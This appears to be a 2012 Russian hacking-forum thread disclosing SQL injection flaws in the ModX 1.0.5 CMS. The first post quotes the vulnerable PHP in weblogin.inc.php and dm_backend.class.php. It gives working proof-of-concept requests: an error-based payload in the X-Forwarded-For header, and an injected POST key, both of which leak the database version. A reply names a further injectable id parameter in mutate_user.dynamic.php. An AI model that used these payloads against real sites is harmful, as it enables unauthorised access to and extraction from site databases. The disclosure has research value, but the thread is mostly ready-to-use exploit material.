bSQL inj <== ModX v. 1.0.5

Discussion in 'Веб-уязвимости' started by TeamPro, 8 Aug 2012.

  1. TeamPro

    TeamPro Banned

    Joined:
    28 Mar 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    2
    Автор: TeamPRO (c)
    Дата: 22.07.2012
    Наличие патча: -

    Blind SQL Injection
    Требования: Аккаунт пользователя / magic_quotes = off
    Уязвимый скрипт: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php
    PHP:
        if (getenv("HTTP_CLIENT_IP")) $ip getenv("HTTP_CLIENT_IP");
        else if(    getenv("HTTP_X_FORWARDED_FOR")) $ip getenv("HTTP_X_FORWARDED_FOR");
        else if(    getenv("REMOTE_ADDR")) $ip getenv("REMOTE_ADDR");
        else     $ip "UNKNOWN";$_SESSION['ip'] = $ip;
        
            $itemid = isset($_REQUEST['id']) && is_numeric($_REQUEST['id']) ? $_REQUEST['id'] : 'NULL' ;$lasthittime time();$a 998;
        if(    $a!=1) {
                $sql "REPLACE INTO $dbase.`".$table_prefix."active_users` (internalKey, username, lasthit, action, id, ip) values(-".$_SESSION['webInternalKey'].", '".$_SESSION['webShortname']."', '".$lasthittime."', '".$a."', ".$itemid.", '$ip')";
            if(!    $rs $modx->dbQuery($sql)) {
                    $output "error replacing into active users! SQL: ".$sql;
                return;
            }
    P0C:
    авторизируемся.Посылаем еще один запрос со своими куками.
    Code:
    GET \ POST http://localhost/modx-1.0.5/
[B]X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa[/B]
Cookie: [mycookies]
    --->
    Code:
    Execution of a query to the database failed - Duplicate column name [B]'5.0.92-log'[/B] »
    Blind SQL Injection
    Требования: аккаунт администратора
    Уязвимый скрипт: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php
    PHP:
    foreach ($_POST as $key => $value) {
                    if (    substr($key010) == 'update_tv_' && $value == 'yes') {
                            $tvKeyName substr($key10);                    
                            $typeSQL $this->modx->db->select('*'$this->modx->getFullTableName('site_tmplvars'), 'id=' $tvKeyName '');
                            $row $this->modx->db->getRow($typeSQL);
    P0C:
    Code:
    POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1

tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
    --->
    Code:
    Execution of a query to the database failed - Duplicate entry '[B]5.0.92-log[/B]1' for key 'group_key' »
     
    #1 TeamPro, 8 Aug 2012
    2 people like this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не знаю как в 1.0.5 но в 1.0.6 параметр id уязвимо, хотя скуля без вывода

    modx/manager/actions/mutate_user.dynamic.php

    PHP:
        if ($_GET['a'] == '12') { // only do this bit if the user is being edited
                $sql "SELECT * FROM $dbase.`" $table_prefix "member_groups` where member=" $_GET['id'] . "";
                $rs mysql_query($sql);
                $limit mysql_num_rows($rs);
            for (    $i 0$i $limit$i++) {
                    $currentgroup mysql_fetch_assoc($rs);
                    $groupsarray[$i] = $currentgroup['user_group'];
            }
        }
     
    _________________________
    #2 Konqi, 8 Aug 2012
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.